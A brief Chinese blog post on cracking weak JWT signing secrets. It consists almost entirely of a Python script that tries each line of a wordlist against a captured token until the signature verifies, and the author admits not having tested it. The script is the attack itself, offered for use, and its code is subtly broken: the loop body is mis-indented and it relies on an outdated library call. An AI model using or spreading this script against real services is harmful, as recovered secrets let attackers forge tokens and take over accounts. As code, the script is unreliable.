0
点赞
收藏
分享

微信扫一扫

jwt爆破弱密钥

探头的新芽 2022-04-27 阅读 53
jwtjava

还未复现,看看思路

>pip3 install pyjwt
>python3 crack.py
import jwt
import termcolor

jwt_str = R'token'
with open('/root/password.txt') as f:
  for line in f:
  key_ = line.strip()
  try:
    jwt.decode(jwt_str,verify=True,key=key_)
    print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
    break
  except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
    print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
  except jwt.exceptions.InvalidSignatureError:
    print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)
    continue
else:
  print('\r','\bnot found.')

参考:https://github.com/xiaoy-sec/Pentest_Note#%E6%B0%B4%E5%9D%91%E6%94%BB%E5%87%BB

举报

相关推荐

0 条评论